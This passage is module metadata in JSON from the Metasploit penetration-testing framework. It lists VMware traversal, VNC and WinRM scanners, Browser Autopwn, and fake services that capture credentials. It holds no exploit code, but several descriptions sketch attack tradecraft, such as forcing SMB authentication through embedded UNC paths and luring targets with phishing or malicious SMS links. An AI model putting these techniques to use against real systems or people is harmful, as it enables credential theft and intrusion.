"path": "/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_screenshot_stealer",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_server_dir_trav": {
"name": "VMware Server Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/vmware/vmware_server_dir_trav",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module exploits the VMware Server Directory Traversal\n vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before\n 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5,\n which allows remote attackers to read arbitrary files. Common VMware Server ports\n are 80/8222 and 443/8333 (SSL). If you want to download the entire VM, check out\n the gueststealer tool.",
"references": [
"URL-http://www.vmware.com/security/advisories/VMSA-2009-0015.html",
"OSVDB-59440",
"BID-36842",
"CVE-2009-3733",
"URL-http://fyrmassociates.com/tools/gueststealer-v1.1.pl"
],
"platform": "",
"arch": "",
"rport": 8222,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_server_dir_trav",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_update_manager_traversal": {
"name": "VMWare Update Manager 4 Directory Traversal",
"full_name": "auxiliary/scanner/vmware/vmware_update_manager_traversal",
"rank": 300,
"disclosure_date": "2011-11-21",
"type": "auxiliary",
"author": [
"Alexey Sintsov",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in VMware Update Manager\n on port 9084. Versions affected by this vulnerability: vCenter Update Manager\n 4.1 prior to Update 2, vCenter Update Manager 4 Update 4.",
"references": [
"CVE-2011-4404",
"EDB-18138",
"URL-http://www.vmware.com/security/advisories/VMSA-2011-0014.html",
"URL-http://dsecrg.com/pages/vul/show.php?id=342"
],
"platform": "",
"arch": "",
"rport": 9084,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_update_manager_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vnc/ard_root_pw": {
"name": "Apple Remote Desktop Root Vulnerability",
"full_name": "auxiliary/scanner/vnc/ard_root_pw",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jgor"
],
"description": "Enables the root account and sets its password to a chosen value on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled. Note that this makes a persistent change to the target host.",
"references": [
"CVE-2017-13872",
"URL-https://support.apple.com/en-us/HT208315"
],
"platform": "",
"arch": "",
"rport": 5900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-01-05 10:12:13 +0000",
"path": "/modules/auxiliary/scanner/vnc/ard_root_pw.rb",
"is_install_path": true,
"ref_name": "scanner/vnc/ard_root_pw",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vnc/vnc_login": {
"name": "VNC Authentication Scanner",
"full_name": "auxiliary/scanner/vnc/vnc_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"carstein <carstein.sec@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module will test a VNC server on a range of machines and\n report successful logins. Currently it supports RFB protocol\n version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response\n authentication method.",
"references": [
"CVE-1999-0506"
],
"platform": "",
"arch": "",
"rport": 5900,
"autofilter_ports": [
5900,
5901,
5902,
5903,
5904,
5905,
5906,
5907,
5908,
5909,
5910
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
"is_install_path": true,
"ref_name": "scanner/vnc/vnc_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vnc/vnc_none_auth": {
"name": "VNC Authentication None Detection",
"full_name": "auxiliary/scanner/vnc/vnc_none_auth",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"jduck <jduck@metasploit.com>"
],
"description": "Detect VNC servers that support the \"None\" authentication method.",
"references": [
"CVE-2006-2369",
"URL-http://en.wikipedia.org/wiki/RFB",
"URL-http://en.wikipedia.org/wiki/Vnc"
],
"platform": "",
"arch": "",
"rport": 5900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vnc/vnc_none_auth.rb",
"is_install_path": true,
"ref_name": "scanner/vnc/vnc_none_auth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/voice/recorder": {
"name": "Telephone Line Voice Scanner",
"full_name": "auxiliary/scanner/voice/recorder",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module dials a range of phone numbers and records audio from each answered call",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/voice/recorder.rb",
"is_install_path": true,
"ref_name": "scanner/voice/recorder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vxworks/wdbrpc_bootline": {
"name": "VxWorks WDB Agent Boot Parameter Scanner",
"full_name": "auxiliary/scanner/vxworks/wdbrpc_bootline",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory",
"references": [
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb",
"is_install_path": true,
"ref_name": "scanner/vxworks/wdbrpc_bootline",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vxworks/wdbrpc_version": {
"name": "VxWorks WDB Agent Version Scanner",
"full_name": "auxiliary/scanner/vxworks/wdbrpc_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Scan for exposed VxWorks wdbrpc daemons",
"references": [
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb",
"is_install_path": true,
"ref_name": "scanner/vxworks/wdbrpc_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/winrm/winrm_auth_methods": {
"name": "WinRM Authentication Method Detection",
"full_name": "auxiliary/scanner/winrm/winrm_auth_methods",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thelightcosine"
],
"description": "This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.\n If it is a WinRM service, it also gathers the Authentication Methods supported.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_auth_methods",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/winrm/winrm_cmd": {
"name": "WinRM Command Runner",
"full_name": "auxiliary/scanner/winrm/winrm_cmd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thelightcosine"
],
"description": "This module runs arbitrary Windows commands using the WinRM service. Valid credentials are required.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": null,
"mod_time": "2019-02-28 15:03:04 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_cmd",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/winrm/winrm_login": {
"name": "WinRM Login Utility",
"full_name": "auxiliary/scanner/winrm/winrm_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thelightcosine"
],
"description": "This module attempts to authenticate to a WinRM service. It currently\n works only if the remote end allows Negotiate (NTLM) authentication.\n Kerberos is not currently supported. Please note: in order to use this\n module without SSL, the 'AllowUnencrypted' winrm option must be set on the target.\n Otherwise adjust the port and set the SSL options in the module as appropriate.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/winrm/winrm_wql": {
"name": "WinRM WQL Query Runner",
"full_name": "auxiliary/scanner/winrm/winrm_wql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thelightcosine"
],
"description": "This module runs WQL queries against remote WinRM services.\n Authentication is required. Currently only works with NTLM auth.\n Please note that in order to use this module, the 'AllowUnencrypted'\n winrm option must be set on the target.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_wql",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/wproxy/att_open_proxy": {
"name": "Open WAN-to-LAN proxy on AT&T routers",
"full_name": "auxiliary/scanner/wproxy/att_open_proxy",
"rank": 300,
"disclosure_date": "2017-08-31",
"type": "auxiliary",
"author": [
"Joseph Hutchins",
"Jon Hart <jon_hart[AT]rapid7.com>",
"Adam Cammack <adam_cammack[AT]rapid7.com>"
],
"description": "The Arris NVG589 and NVG599 routers configured with AT&T U-verse\n firmware 9.2.2h0d83 expose an unauthenticated proxy that allows\n connecting from WAN to LAN by MAC address.",
"references": [
"CVE-2017-14117",
"URL-https://www.nomotion.net/blog/sharknatto/",
"URL-https://blog.rapid7.com/2017/09/07/measuring-sharknat-to-exposures/#vulnerability5port49152tcpexposure"
],
"platform": "",
"arch": "",
"rport": 49152,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py",
"is_install_path": true,
"ref_name": "scanner/wproxy/att_open_proxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"SharknAT&To",
"sharknatto"
]
}
},
"auxiliary_scanner/wsdd/wsdd_query": {
"name": "WS-Discovery Information Discovery",
"full_name": "auxiliary/scanner/wsdd/wsdd_query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "Discover information from Web Services Dynamic Discovery (WS-Discovery)\n enabled systems.",
"references": [
"URL-https://msdn.microsoft.com/en-us/library/windows/desktop/bb513684(v=vs.85).aspx",
"URL-http://specs.xmlsoap.org/ws/2005/04/discovery/ws-discovery.pd",
"URL-https://en.wikipedia.org/wiki/Web_Services_for_Devices",
"URL-https://en.wikipedia.org/wiki/WS-Discovery",
"URL-https://en.wikipedia.org/wiki/Zero-configuration_networking#WS-Discovery"
],
"platform": "",
"arch": "",
"rport": 3702,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/scanner/wsdd/wsdd_query.rb",
"is_install_path": true,
"ref_name": "scanner/wsdd/wsdd_query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/x11/open_x11": {
"name": "X11 No-Auth Scanner",
"full_name": "auxiliary/scanner/x11/open_x11",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebodell@gmail.com>"
],
"description": "This module scans for X11 servers that allow anyone\n to connect without authentication.",
"references": [
"OSVDB-309",
"CVE-1999-0526"
],
"platform": "",
"arch": "",
"rport": 6000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/x11/open_x11.rb",
"is_install_path": true,
"ref_name": "scanner/x11/open_x11",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/android_browsable_msf_launch": {
"name": "Android Meterpreter Browsable Launcher",
"full_name": "auxiliary/server/android_browsable_msf_launch",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows you to open an android meterpreter via a browser. An Android\n meterpreter must be installed as an application beforehand on the target device\n in order to use this.\n\n For best results, you can consider using the auxiliary/client/sms/send_text to\n trick your target into opening the malicious link, and wake up Meterpreter.",
"references": [
"URL-http://developer.android.com/reference/android/content/Intent.html#CATEGORY_BROWSABLE"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/android_browsable_msf_launch.rb",
"is_install_path": true,
"ref_name": "server/android_browsable_msf_launch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/android_mercury_parseuri": {
"name": "Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability",
"full_name": "auxiliary/server/android_mercury_parseuri",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rotlogix",
"sinn3r <sinn3r@metasploit.com>",
"joev <joev@metasploit.com>"
],
"description": "This module exploits an unsafe intent URI scheme and directory traversal found in\n Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a\n private wifi manager activity, which starts a web server for Mercury on port 8888.\n The webserver also suffers a directory traversal that allows remote access to\n sensitive files.\n\n By default, this module will go after webviewCookiesChromium.db, webviewCookiesChromiumPrivate.db,\n webview.db, and bookmarks.db. But if this isn't enough, you can also specify the\n ADDITIONAL_FILES datastore option to collect more files.",
"references": [
"URL-http://rotlogix.com/2015/08/23/exploiting-the-mercury-browser-for-android/",
"URL-http://versprite.com/og/multiple-vulnerabilities-in-mercury-browser-for-android-version-3-0-0/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/android_mercury_parseuri.rb",
"is_install_path": true,
"ref_name": "server/android_mercury_parseuri",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/browser_autopwn": {
"name": "HTTP Client Automatic Exploiter",
"full_name": "auxiliary/server/browser_autopwn",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "This module has three actions. The first (and the default)\n is 'WebServer' which uses a combination of client-side and\n server-side techniques to fingerprint HTTP clients and then\n automatically exploit them. Next is 'DefangedDetection' which\n does only the fingerprinting part. Lastly, 'list' simply\n prints the names of all exploit modules that would be used by\n the WebServer action given the current MATCH and EXCLUDE\n options.\n\n Also adds a 'list' command which is the same as running with\n ACTION=list.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/browser_autopwn.rb",
"is_install_path": true,
"ref_name": "server/browser_autopwn",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/browser_autopwn2": {
"name": "HTTP Client Automatic Exploiter 2 (Browser Autopwn)",
"full_name": "auxiliary/server/browser_autopwn2",
"rank": 300,
"disclosure_date": "2015-07-05",
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will automatically serve browser exploits. Here are the options you can\n configure:\n\n The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example,\n if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.\n\n The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash\n exploits, you can set this. Also note that the Exclude option will always be evaluated\n after the Include option.\n\n The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.\n By default, 20 will be loaded. But note that the client will probably not be vulnerable\n to all 20 of them, so only some will actually be served to the client.\n\n The HTMLContent option allows you to provide a basic webpage. This is what the user behind\n the vulnerable browser will see. You can simply set a string, or you can do the file://\n syntax to load an HTML file. Note this option might break exploits so try to keep it\n as simple as possible.\n\n The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to\n get. The default -1 means unlimited. Combining this with other options such as RealList\n and Custom404, you can get information about which visitors (IPs) clicked on your malicious\n link, what exploits they might be vulnerable to, redirect them to your own internal\n training website without actually attacking them.\n\n For more information about Browser Autopwn, please see the referenced blog post.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/server/browser_autopwn2.rb",
"is_install_path": true,
"ref_name": "server/browser_autopwn2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/drda": {
"name": "Authentication Capture: DRDA (DB2, Informix, Derby)",
"full_name": "auxiliary/server/capture/drda",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake DRDA (DB2, Informix, Derby) server\n that is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/capture/drda.rb",
"is_install_path": true,
"ref_name": "server/capture/drda",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/ftp": {
"name": "Authentication Capture: FTP",
"full_name": "auxiliary/server/capture/ftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake FTP service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-04 21:46:01 +0000",
"path": "/modules/auxiliary/server/capture/ftp.rb",
"is_install_path": true,
"ref_name": "server/capture/ftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/http": {
"name": "Authentication Capture: HTTP",
"full_name": "auxiliary/server/capture/http",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake HTTP service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/http.rb",
"is_install_path": true,
"ref_name": "server/capture/http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/http_basic": {
"name": "HTTP Client Basic Authentication Credential Collector",
"full_name": "auxiliary/server/capture/http_basic",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"saint patrick <saintpatrick@l1pht.com>"
],
"description": "This module responds to all requests for resources with a HTTP 401. This should\n cause most browsers to prompt for a credential. If the user enters Basic Auth creds\n they are sent to the console.\n\n This may be helpful in some phishing expeditions where it is possible to embed a\n resource into a page.\n\n This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-08 21:23:27 +0000",
"path": "/modules/auxiliary/server/capture/http_basic.rb",
"is_install_path": true,
"ref_name": "server/capture/http_basic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/http_javascript_keylogger": {
"name": "Capture: HTTP JavaScript Keylogger",
"full_name": "auxiliary/server/capture/http_javascript_keylogger",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Marcus J. Carey <mjc@threatagent.com>",
"hdm <x@hdm.io>"
],
"description": "This module runs a web server that demonstrates keystroke\n logging through JavaScript. The DEMO option can be set to enable\n a page that demonstrates this technique. Future improvements will\n allow for a configurable template to be used with this module.\n To use this module with an existing web page, simply add a\n script source tag pointing to the URL of this service ending\n in the .js extension. For example, if URIPATH is set to \"test\",\n the following URL will load this script into the calling site:\n http://server:port/test/anything.js",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/http_javascript_keylogger.rb",
"is_install_path": true,
"ref_name": "server/capture/http_javascript_keylogger",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/http_ntlm": {
"name": "HTTP Client MS Credential Catcher",
"full_name": "auxiliary/server/capture/http_ntlm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ryan Linn <sussurro@happypacket.net>"
],
"description": "This module attempts to quietly catch NTLM/LM Challenge hashes.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/capture/http_ntlm.rb",
"is_install_path": true,
"ref_name": "server/capture/http_ntlm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/imap": {
"name": "Authentication Capture: IMAP",
"full_name": "auxiliary/server/capture/imap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake IMAP service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-08 21:23:27 +0000",
"path": "/modules/auxiliary/server/capture/imap.rb",
"is_install_path": true,
"ref_name": "server/capture/imap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/mssql": {
"name": "Authentication Capture: MSSQL",
"full_name": "auxiliary/server/capture/mssql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake MSSQL service that\n is designed to capture authentication credentials. The module\n supports both the weakly encoded database logins and Windows\n logins (NTLM).",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/mssql.rb",
"is_install_path": true,
"ref_name": "server/capture/mssql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/mysql": {
"name": "Authentication Capture: MySQL",
"full_name": "auxiliary/server/capture/mysql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake MySQL service that is designed to\n capture authentication credentials. It captures challenge and\n response pairs that can be supplied to Cain or JtR for cracking.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-09 18:32:21 +0000",
"path": "/modules/auxiliary/server/capture/mysql.rb",
"is_install_path": true,
"ref_name": "server/capture/mysql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/pop3": {
"name": "Authentication Capture: POP3",
"full_name": "auxiliary/server/capture/pop3",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake POP3 service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/pop3.rb",
"is_install_path": true,
"ref_name": "server/capture/pop3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/postgresql": {
"name": "Authentication Capture: PostgreSQL",
"full_name": "auxiliary/server/capture/postgresql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dhiru Kholia <dhiru@openwall.com>"
],
"description": "This module provides a fake PostgreSQL service that is designed to\n capture clear-text authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/postgresql.rb",
"is_install_path": true,
"ref_name": "server/capture/postgresql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/printjob_capture": {
"name": "Printjob Capture Service",
"full_name": "auxiliary/server/capture/printjob_capture",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"todb <todb@metasploit.com>"
],
"description": "This module is designed to listen for PJL or PostScript print\n jobs. Once a print job is detected it is saved to loot. The\n captured printjob can then be forwarded on to another printer\n (required for LPR printjobs). Resulting PCL/PS files can be\n read with GhostScript/GhostPCL.\n\n Note, this module does not yet support IPP connections.",
"references": [
"URL-http://blog.c22.cc/toolsscripts/prn-2-me/",
"URL-http://www.ghostscript.com"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/server/capture/printjob_capture.rb",
"is_install_path": true,
"ref_name": "server/capture/printjob_capture",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/sip": {
"name": "Authentication Capture: SIP",
"full_name": "auxiliary/server/capture/sip",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake SIP service that is designed to\n capture authentication credentials. It captures challenge and\n response pairs that can be supplied to Cain or JtR for cracking.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/capture/sip.rb",
"is_install_path": true,
"ref_name": "server/capture/sip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/smb": {
"name": "Authentication Capture: SMB",
"full_name": "auxiliary/server/capture/smb",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides an SMB service that can be used to capture the\n challenge-response password hashes of SMB client systems. Responses\n sent by this service have by default the configurable challenge string\n (\\x11\\x22\\x33\\x44\\x55\\x66\\x77\\x88), allowing for easy cracking using\n Cain & Abel, L0phtcrack or John the Ripper (with jumbo patch).\n\n To exploit this, the target system must try to authenticate to this\n module. One way to force an SMB authentication attempt is by embedding\n a UNC path (\\\\SERVER\\SHARE) into a web page or email message. When\n the victim views the web page or email, their system will\n automatically connect to the server specified in the UNC share (the IP\n address of the system running this module) and attempt to\n authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to\n respond to queries for names the victim is already looking for.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
